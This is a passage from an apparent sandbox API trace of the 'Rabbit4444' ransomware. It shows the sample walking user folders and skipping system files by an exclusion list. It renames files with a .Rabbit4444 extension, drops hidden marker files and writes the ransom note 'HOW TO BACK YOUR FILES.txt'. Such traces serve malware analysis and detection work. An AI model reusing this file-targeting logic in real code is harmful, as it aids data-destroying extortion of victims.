[0055.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123818 [0055.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0055.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123818 | out: hHeap=0xe0000) returned 1 [0055.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0055.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123818 [0055.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0055.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123818 | out: hHeap=0xe0000) returned 1 [0055.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0055.998] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14730831344) returned 1 [0055.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0055.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0055.998] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.998] CloseHandle (hObject=0x298) returned 1 [0055.998] CloseHandle (hObject=0x278) returned 1 [0055.998] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 110 [0055.998] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0055.999] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdaed6159, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdaed6159, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdaed6159, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0055.999] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0055.999] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0055.999] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0055.999] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0055.999] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0055.999] lstrlenW (lpString="Rabbit4444") returned 10 [0055.999] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0056.000] lstrlenW (lpString=".dll") returned 4 [0056.000] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0056.000] lstrlenW (lpString=".lnk") returned 4 [0056.000] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0056.000] lstrlenW (lpString=".ini") returned 4 [0056.000] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0056.000] lstrlenW (lpString=".sys") returned 4 [0056.000] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0056.000] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdaed6159, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdaed6159, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdaed6159, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0056.000] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0056.000] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.000] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.000] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.001] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.002] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.002] CloseHandle (hObject=0x278) returned 1 [0056.002] CloseHandle (hObject=0x27c) returned 1 [0056.002] GetCurrentThreadId () returned 0xd98 [0056.002] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0056.002] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState" [0056.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0056.002] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0056.002] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState" [0056.002] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\" [0056.002] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0056.002] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.007] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.010] FlushFileBuffers (hFile=0x27c) returned 1 [0056.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.011] CloseHandle (hObject=0x27c) returned 1 [0056.012] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState") returned 85 [0056.012] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.012] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e342c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab563c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0056.012] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.012] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.012] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.012] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.012] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e342c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab563c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.012] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.012] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.012] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.012] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.012] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.012] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab563c5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab563c5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.012] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.012] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.012] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab563c5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab563c5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.013] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0056.013] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.013] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.013] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.013] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.013] CloseHandle (hObject=0x278) returned 1 [0056.014] CloseHandle (hObject=0x27c) returned 1 [0056.014] GetCurrentThreadId () returned 0xd98 [0056.014] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0056.014] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState" [0056.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118188 | out: hHeap=0xe0000) returned 1 [0056.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0056.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState" [0056.014] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\" [0056.014] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0056.014] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.015] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.017] FlushFileBuffers (hFile=0x27c) returned 1 [0056.018] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.018] CloseHandle (hObject=0x27c) returned 1 [0056.019] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState") returned 83 [0056.019] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.019] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e3325d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0056.019] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.019] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.019] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.019] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.019] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e3325d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.019] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.019] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.019] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.019] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.019] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.019] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab5ecb2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab5ecb2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.019] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.019] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.019] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab5ecb2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab5ecb2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.019] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0056.020] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.020] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.020] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.020] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.021] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.021] CloseHandle (hObject=0x278) returned 1 [0056.021] CloseHandle (hObject=0x27c) returned 1 [0056.021] GetCurrentThreadId () returned 0xd98 [0056.021] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0056.021] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache" [0056.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118b28 | out: hHeap=0xe0000) returned 1 [0056.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0056.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache" [0056.021] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\" [0056.021] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0056.021] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.022] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.025] FlushFileBuffers (hFile=0x27c) returned 1 [0056.026] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.026] CloseHandle (hObject=0x27c) returned 1 [0056.026] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache") returned 83 [0056.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.026] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e32663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0056.027] lstrcmpiW (lpString1=".", lpString2="HOW TO 